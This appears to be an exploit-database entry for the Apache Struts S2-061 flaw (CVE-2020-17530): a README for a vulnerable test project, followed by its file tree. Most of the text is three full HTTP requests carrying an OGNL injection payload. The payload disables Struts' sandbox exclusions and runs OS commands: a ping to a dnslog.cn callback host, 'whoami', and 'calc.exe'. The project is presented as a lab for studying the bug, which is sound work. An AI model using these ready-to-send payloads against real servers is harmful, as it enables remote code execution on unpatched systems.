CVE-2020-17530 PoC — Apache Struts 代码注入漏洞

Source

Associated Vulnerability

Description

S2-061 CVE-2020-17530

Readme

## What's this
This is a Simple test Project for S2-061 which can be used to analysis the detail of this vulnerability.

## How to use 

Step 1:Use IDEA  import this project

Step 2:setup tomcat Server

Step 3:Use browser access "http://192.168.174.149:8080/SimpleStruts_war_exploded/S2061.action?id=%25%7b8%2a8%7d"

![simpletst](image/simpletst.png)

### How to Exploit

##### SSRF Test

~~~
POST /SimpleStruts_war_exploded/S2061.action HTTP/1.1
Host: 192.168.174.149:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0DD7F8E6B11D062C574037318DC36C2D
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 846

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("ping 4ofoqe.dnslog.cn")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
~~~

![SSRF](image/SSRF.png)

DNSLog：

![DNSLog](image/DNSLog.png)

##### System command

~~~
POST /SimpleStruts_war_exploded/S2061.action HTTP/1.1
Host: 192.168.174.149:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0DD7F8E6B11D062C574037318DC36C2D
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 831

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("whoami")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
~~~

![system_command](image/system_command.png)

##### execute calc

~~~
POST /SimpleStruts_war_exploded/S2061.action HTTP/1.1
Host: 192.168.174.149:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0DD7F8E6B11D062C574037318DC36C2D
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 833

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("calc.exe")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
~~~

![calc_1](image/calc_1.png)

result:![calc_2](image/calc_2.jpg)

File Snapshot

 [4.0K]  /data/pocs/be3a666dc8d8c3b5350ebfb83ddb395d9a3fb7fc
├── [4.0K]  CVE-2020-17530
│   ├── [2.5K]  pom.xml
│   ├── [ 360]  SimpleStruts.iml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           ├── [4.0K]  java
│           │   └── [4.0K]  org
│           │       └── [4.0K]  heptagram
│           │           └── [4.0K]  action
│           │               └── [ 343]  IndexAction.java
│           ├── [4.0K]  resources
│           │   └── [ 550]  struts.xml
│           └── [4.0K]  webapp
│               ├── [  91]  index.jsp
│               ├── [ 270]  S2061.jsp
│               └── [4.0K]  WEB-INF
│                   └── [ 501]  web.xml
├── [4.0K]  image
│   ├── [ 70K]  calc_1.png
│   ├── [284K]  calc_2.jpg
│   ├── [ 28K]  DNSLog.png
│   ├── [ 46K]  simpletst.png
│   ├── [ 94K]  SSRF.png
│   └── [ 71K]  system_command.png
└── [4.4K]  README.md

11 directories, 14 files

Remarks